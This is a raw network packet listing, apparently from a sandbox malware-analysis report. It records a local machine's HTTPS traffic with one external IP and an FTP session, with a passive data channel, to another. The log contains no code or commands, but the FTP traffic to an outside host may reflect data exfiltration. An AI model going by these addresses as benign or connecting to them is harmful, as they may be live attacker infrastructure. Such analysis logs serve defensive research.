                                                        Oct 7, 2024 09:13:32.830173016 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.830224037 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.830594063 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.830641031 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.830862045 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.830909014 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.831023932 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.831073046 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.831176996 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.831228018 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.831597090 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.831645966 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.831710100 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.831753016 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.832444906 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.832509995 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.832725048 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.832834959 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.832915068 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.832961082 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.853801966 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.853933096 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.902579069 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.902643919 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.902805090 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.902822971 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.902879953 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.918628931 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.918710947 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.918771982 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.918780088 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.918800116 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.918823004 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.918823004 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.918829918 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.918873072 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.918941975 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.919056892 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.919298887 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.919346094 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.919708967 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.919790983 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.919909000 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.919976950 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.920010090 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.920056105 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.920101881 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.920164108 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.920330048 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.920403957 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.920485973 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.920835018 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.921184063 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.921262026 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.921403885 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.921492100 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.921626091 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.921726942 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.942583084 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.942754984 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.991523027 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.991697073 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.991713047 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.991775036 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.007441998 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.007544994 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.007556915 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.007689953 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.007713079 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.007718086 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.007741928 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.007819891 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.007858992 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.007916927 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.008331060 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.008389950 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.008810997 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.008871078 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.009042025 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.009093046 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.009149075 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.009206057 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.009361982 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.009412050 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.009488106 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.009829998 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.009850979 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.009855032 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.009876013 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.009897947 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.009907961 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.009944916 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.019592047 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:35.353775024 CEST4973121192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:35.358617067 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:35.362174988 CEST4973121192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:36.050350904 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:36.050604105 CEST4973121192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:36.055429935 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:36.309659004 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:36.309820890 CEST4973121192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:36.315190077 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:36.663338900 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:36.663503885 CEST4973121192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:36.668422937 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:36.922656059 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:36.922807932 CEST4973121192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:36.927807093 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:37.181900978 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:37.182140112 CEST4973121192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:37.186943054 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:37.441587925 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:37.441781998 CEST4973121192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:37.446542978 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:37.740680933 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:37.741725922 CEST4973261569192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:37.746551991 CEST61569497325.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:37.746628046 CEST4973261569192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:37.746922016 CEST4973121192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:37.751697063 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:38.457134962 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:38.457461119 CEST4973261569192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:38.457511902 CEST4973261569192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:38.462392092 CEST61569497325.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:38.462721109 CEST61569497325.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:38.462799072 CEST4973261569192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:38.506279945 CEST4973121192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:38.716300011 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:38.771631002 CEST4973121192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:42.952534914 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:42.952635050 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:42.952718019 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:42.996880054 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:42.996907949 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.593029022 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.593115091 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:43.594746113 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:43.594752073 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.594986916 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.645559072 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:43.687410116 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.770335913 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.770402908 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.770423889 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.770452976 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:43.770464897 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.770483971 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:43.793109894 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.793201923 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:43.793211937 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.834120989 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:43.860439062 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.860486984 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.860506058 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.860507011 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:43.860555887 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:43.861459970 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.861479998 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.861517906 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:43.861543894 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:43.862366915 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.862385988 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.862420082 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:43.862442970 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:43.883716106 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.883743048 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.883781910 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:43.883816957 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:43.950839996 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.950922012 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:43.951179028 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.951242924 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:43.951836109 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.951910973 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:43.952478886 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.952547073 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:43.953445911 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.953516006 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:43.954533100 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.954602003 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:43.955257893 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.955326080 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:43.974872112 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.974956989 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.041683912 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.041769981 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.041847944 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.041912079 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.042305946 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.042378902 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.042428970 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.042474031 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.043209076 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.043275118 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.043724060 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.043782949 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.043868065 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.043931961 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.044697046 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.044754982 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.044917107 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.044985056 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.045697927 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.045782089 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.045847893 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.045932055 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.046663046 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.046726942 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.065599918 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.065673113 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.065778971 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.065840006 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.065871954 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.065937996 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.132410049 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.132486105 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.132524967 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.132579088 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.132886887 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.132976055 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.133176088 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.133238077 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.133336067 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.133403063 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.133716106 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.133769035 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.133960009 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.134021044 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.134125948 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.134187937 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.134244919 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.134314060 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.134907961 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.134991884 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.135035038 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.135080099 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.135104895 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.135154009 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.135216951 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.137829065 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.137897968 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.155860901 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.155929089 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.156050920 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.156105042 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.222862959 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.222934961 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.223031044 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.223109961 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.223184109 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.223247051 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.223443985 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.223503113 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.223561049 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.223623037 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.223695993 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.223753929 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.223798037 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.223870039 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.223977089 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.224035978 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.224160910 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.224288940 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.224324942 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.224338055 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.224358082 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.224364996 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.224499941 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.224564075 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.224617004 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.224679947 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.224761963 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.224821091 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.224890947 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.224957943 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.246901989 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.246979952 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.247036934 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.247095108 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.313930035 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.314017057 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.314088106 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.314155102 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.314228058 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.314300060 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.314349890 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.314414978 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.314497948 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.314559937 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.314642906 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.314707994 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.314709902 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.314722061 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.314762115 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.314778090 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.314821959 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.314841032 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.314913034 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.314915895 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.314928055 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.314969063 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.314969063 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.314980984 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.315011024 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.315038919 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.315088987 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.315145016 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.315313101 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.315357924 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.315376043 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.315392971 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.315412045 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.315524101 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.315582037 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.315589905 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.315635920 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.337457895 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.337534904 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.674216032 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.674318075 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.674644947 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.674702883 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.674706936 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.674719095 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.674756050 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.674771070 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.674962997 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.675040007 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.675108910 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.675168037 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.675343037 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.675412893 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.675436974 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.675532103 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.675647974 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:44.675709963 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:44.675867081 CEST4434973367.212.175.162192.168.2.4
